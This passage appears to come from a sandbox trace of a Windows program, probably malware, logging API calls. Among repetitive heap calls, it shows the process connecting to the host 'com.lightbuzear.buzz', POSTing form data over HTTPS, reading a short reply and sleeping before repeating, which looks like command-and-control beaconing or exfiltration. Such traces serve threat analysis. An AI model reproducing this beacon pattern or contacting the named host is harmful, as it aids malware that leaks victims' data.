Flags=0x0, Size=0x3) returned 0x47ce640 [0217.040] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0217.040] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6a0 [0217.040] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0217.040] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce680 [0217.040] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6a0 | out: hHeap=0x4780000) returned 1 [0217.040] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482ea30 [0217.040] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0217.040] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482ebb0 [0217.040] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ea30 | out: hHeap=0x4780000) returned 1 [0217.040] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0217.040] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ebb0 | out: hHeap=0x4780000) returned 1 [0217.040] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x482eb98 [0217.040] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830a48 [0217.041] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830a48 | out: hHeap=0x4780000) returned 1 [0217.041] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0217.041] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830e58 [0217.041] LoadLibraryW (lpLibFileName="Urlmon.dll") returned 0x71780000 [0217.041] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce610 [0217.041] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce680 [0217.041] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0217.041] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6b0 [0217.041] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0217.042] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce670 [0217.042] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6b0 | out: hHeap=0x4780000) returned 1 [0217.042] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce690 [0217.042] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0217.042] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482ea18 [0217.042] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0217.042] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482eca0 [0217.042] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ea18 | out: hHeap=0x4780000) returned 1 [0217.042] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0217.042] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482eca0 | out: hHeap=0x4780000) returned 1 [0217.042] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4830d68 [0217.042] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0217.042] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbc50 [0217.042] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830d68 | out: hHeap=0x4780000) returned 1 [0217.042] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48309d0 [0217.042] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fb978 [0217.042] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830c50 [0217.043] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb978 | out: hHeap=0x4780000) returned 1 [0217.043] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0217.043] GetProcAddress (hModule=0x71780000, lpProcName="ObtainUserAgentString") returned 0x71852f30 [0217.043] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0xdf2f4, cbSize=0xde1cc | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", cbSize=0xde1cc) returned 0x0 [0217.043] FreeLibrary (hLibModule=0x71780000) returned 1 [0217.044] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830c50 | out: hHeap=0x4780000) returned 1 [0217.044] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0217.044] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830a98 [0217.044] InternetConnectA (hInternet=0xcc0004, lpszServerName="com.lightbuzear.buzz", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0217.044] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5c0 [0217.044] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6a0 [0217.044] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5c0 | out: hHeap=0x4780000) returned 1 [0217.044] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce680 [0217.044] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6a0 | out: hHeap=0x4780000) returned 1 [0217.044] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce670 [0217.044] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0217.045] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5a0 [0217.045] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0217.045] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482eca0 [0217.045] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0217.045] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482ea30 [0217.045] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482eca0 | out: hHeap=0x4780000) returned 1 [0217.045] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0217.045] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ea30 | out: hHeap=0x4780000) returned 1 [0217.045] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x482ea78 [0217.045] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830d18 [0217.045] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830d18 | out: hHeap=0x4780000) returned 1 [0217.045] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0217.045] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830ca0 [0217.045] LoadLibraryW (lpLibFileName="Wininet.dll") returned 0x71570000 [0217.046] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830e80 [0217.046] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6c0 [0217.046] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5e0 [0217.046] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0217.046] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5f0 [0217.046] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0217.046] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce670 [0217.046] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5f0 | out: hHeap=0x4780000) returned 1 [0217.046] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce740 [0217.046] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0217.046] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482eb38 [0217.046] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0217.046] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482eaa8 [0217.046] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482eb38 | out: hHeap=0x4780000) returned 1 [0217.046] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0217.046] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482eaa8 | out: hHeap=0x4780000) returned 1 [0217.046] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x482ea30 [0217.047] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830bd8 [0217.047] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830bd8 | out: hHeap=0x4780000) returned 1 [0217.047] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0217.047] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="Kolpt523ytcserstrew/torel", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x800000, dwContext=0x0) returned 0xcc000c [0217.047] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce740 [0217.047] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5e0 [0217.047] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0217.047] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce610 [0217.047] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0217.047] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce670 [0217.047] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0217.048] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce570 [0217.048] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0217.048] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482eaa8 [0217.048] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0217.048] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482ebb0 [0217.048] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482eaa8 | out: hHeap=0x4780000) returned 1 [0217.048] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0217.048] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ebb0 | out: hHeap=0x4780000) returned 1 [0217.048] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4830e30 [0217.048] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0217.048] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbc50 [0217.048] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830e30 | out: hHeap=0x4780000) returned 1 [0217.048] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830d40 [0217.048] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbd30 [0217.048] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830a20 [0217.049] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbd30 | out: hHeap=0x4780000) returned 1 [0217.049] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0217.049] GetProcAddress (hModule=0x71570000, lpProcName="InternetSetOptionA") returned 0x71611dc0 [0217.049] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0xde1c8*, dwBufferLength=0x4) returned 1 [0217.050] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830a20 | out: hHeap=0x4780000) returned 1 [0217.050] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce690 [0217.050] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce670 [0217.050] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0217.050] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce750 [0217.050] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0217.050] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce710 [0217.050] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0217.050] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce690 [0217.050] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0217.050] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482ebb0 [0217.050] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0217.050] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482eb08 [0217.050] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ebb0 | out: hHeap=0x4780000) returned 1 [0217.050] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0217.050] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482eb08 | out: hHeap=0x4780000) returned 1 [0217.050] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4830a70 [0217.051] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0217.051] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbc50 [0217.051] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830a70 | out: hHeap=0x4780000) returned 1 [0217.051] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830ac0 [0217.051] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbd68 [0217.051] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830a20 [0217.051] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbd68 | out: hHeap=0x4780000) returned 1 [0217.052] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0217.052] GetProcAddress (hModule=0x71570000, lpProcName="HttpSendRequestA") returned 0x71638e60 [0217.052] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Content-Type:application/x-www-form-urlencoded", dwHeadersLength=0x2e, lpOptional=0x47a6f78*, dwOptionalLength=0x4b2) returned 1 [0218.150] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830a20 | out: hHeap=0x4780000) returned 1 [0218.150] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5a0 [0218.150] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5b0 [0218.151] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0218.152] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5c0 [0218.152] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6d0 [0218.152] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5c0 | out: hHeap=0x4780000) returned 1 [0218.152] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce690 [0218.152] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0218.152] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5c0 [0218.152] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0218.152] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6e0 [0218.152] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5c0 | out: hHeap=0x4780000) returned 1 [0218.152] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482ec28 [0218.152] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6e0 | out: hHeap=0x4780000) returned 1 [0218.160] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482ea90 [0218.160] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ec28 | out: hHeap=0x4780000) returned 1 [0218.160] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0218.160] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ea90 | out: hHeap=0x4780000) returned 1 [0218.160] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4830b38 [0218.160] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0218.160] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbe80 [0218.160] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830b38 | out: hHeap=0x4780000) returned 1 [0218.160] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830e30 [0218.160] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbcf8 [0218.160] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830d90 [0218.161] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0218.161] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe80 | out: hHeap=0x4780000) returned 1 [0218.161] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0218.161] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x5) returned 1 [0218.162] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830d90 | out: hHeap=0x4780000) returned 1 [0218.162] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0218.162] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce670 [0218.162] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce730 [0218.162] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0218.162] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce640 [0218.162] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0218.162] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce750 [0218.162] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0218.162] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce570 [0218.162] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0218.162] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482eb38 [0218.162] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0218.162] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482ebb0 [0218.162] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482eb38 | out: hHeap=0x4780000) returned 1 [0218.162] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0218.162] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ebb0 | out: hHeap=0x4780000) returned 1 [0218.162] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4830cc8 [0218.163] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0218.163] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbf28 [0218.163] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830cc8 | out: hHeap=0x4780000) returned 1 [0218.163] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830cc8 [0218.163] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbd30 [0218.163] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830cf0 [0218.163] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbd30 | out: hHeap=0x4780000) returned 1 [0218.163] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbf28 | out: hHeap=0x4780000) returned 1 [0218.163] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0218.164] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x0) returned 1 [0218.164] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830cf0 | out: hHeap=0x4780000) returned 1 [0218.164] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0218.164] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0218.164] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0218.164] FreeLibrary (hLibModule=0x71570000) returned 1 [0218.164] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0218.164] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0218.165] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830e80 | out: hHeap=0x4780000) returned 1 [0218.165] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830ca0 | out: hHeap=0x4780000) returned 1 [0218.165] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830a98 | out: hHeap=0x4780000) returned 1 [0218.166] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830e58 | out: hHeap=0x4780000) returned 1 [0218.166] Sleep (dwMilliseconds=0x2710) [0218.209] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce730 [0218.209] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce620 [0218.209] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0218.209] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce670 [0218.209] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0218.209] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6a0 [0218.209] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0218.209] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce570 [0218.209] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6a0 | out: hHeap=0x4780000) returned 1 [0218.209] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482eac0 [0218.209] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0218.210] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482ebb0 [0218.210] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482eac0 | out: hHeap=0x4780000) returned 1 [0218.210] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0218.210] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ebb0 | out: hHeap=0x4780000) returned 1 [0218.210] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x482ea18 [0218.210] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830c50 [0218.210] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830c50 | out: hHeap=0x4780000) returned 1 [0218.210] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0218.210] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830bd8 [0218.210] LoadLibraryW (lpLibFileName="Urlmon.dll") returned 0x71780000 [0218.211] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce710 [0218.211] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce740 [0218.211] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0218.211] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce730 [0218.211] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0218.211] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6c0 [0218.211] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0218.211] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce710 [0218.211] HeapFree (in: hHeap=0x4780000, 